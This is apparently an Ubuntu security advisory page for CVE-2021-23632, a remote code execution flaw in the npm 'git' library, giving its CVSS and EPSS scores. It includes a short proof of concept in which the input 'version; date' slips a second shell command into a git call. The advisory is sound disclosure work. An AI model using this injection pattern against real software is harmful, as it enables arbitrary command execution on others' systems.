Ubuntu.comUB:CVE-2021-23632CVE-2021-23632
7.5 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.008 Low
EPSS
Percentile
81.5%
All versions of package git are vulnerable to Remote Code Execution (RCE)
due to missing sanitization in the Git.git method, which allows execution
of OS commands rather than just git commands. Steps to Reproduce 1. Create
a file named exploit.js with the following content: js var Git =
require(“git”).Git; var repo = new Git(“repo-test”); var user_input =
“version; date”; repo.git(user_input, function(err, result) {
console.log(result); }) 2. In the same directory as exploit.js, run npm
install git. 3. Run exploit.js: node exploit.js. You should see the outputs
of both the git version and date command-lines. Note that the repo-test Git
repository does not need to be present to make this PoC work.
Notes
| Author | Note |
|---|---|
| mdeslaur | this is for the node.js library for git, not git itself |
Related
7.5 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.008 Low
EPSS
Percentile
81.5%